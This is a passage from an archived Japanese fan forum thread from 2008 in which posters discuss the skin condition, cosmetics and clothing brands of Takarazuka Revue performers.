でもあの厚化粧で肌荒れしてる人もいるのにね。
本当に凄い。一緒に公演してみたいw

279 :名無しさん@花束いっぱい。:2008/08/10(日) 11:04:14 ID:m807lL8W
ドーラン焼けするから一般人とは肌色微妙に違うよね。
うちの贔屓はまだ若くてニキビの気になるお年頃だからプロアクティブらしい。ずっとかは不明。舞台化粧しだすと肌荒れるのてきめんらしいから。

280 :名無しさん@花束いっぱい。:2008/08/19(火) 05:37:22 ID:lYuu7Oob
天海は?

281 :名無しさん@花束いっぱい。:2008/08/19(火) 08:15:29 ID:GkiwHsbn
驚愕の美肌!
まとぶさんはどこのお化粧品を使っているのでしょうか?

282 :名無しさん@花束いっぱい。:2008/08/19(火) 10:19:17 ID:jmZ44rRd
化粧惑星

283 :名無しさん@花束いっぱい。:2008/08/19(火) 11:37:31 ID:3W4tU7Xx
しわしわになりそ
絶対つかわねー。

284 :名無しさん@花束いっぱい。:2008/08/19(火) 20:50:22 ID:YbEFtItN
えりたんの肌きれーだなと思うのですが、
化粧品何つかってるんだろう?

285 :名無しさん@花束いっぱい。:2008/09/02(火) 00:43:53 ID:Clnfrj0z
コスメじゃないけど
中堅男役のお洋服は
どのブランドが多いのか?

57 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)